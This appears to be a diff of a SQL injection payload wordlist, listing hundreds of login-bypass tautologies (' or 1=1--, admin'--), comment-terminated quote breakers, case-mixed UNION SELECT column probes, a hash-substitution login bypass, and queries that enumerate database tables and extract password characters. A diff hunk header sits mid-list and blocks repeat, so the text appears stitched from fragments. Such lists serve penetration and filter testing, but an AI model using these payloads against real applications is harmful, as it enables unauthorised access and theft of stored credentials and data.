||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
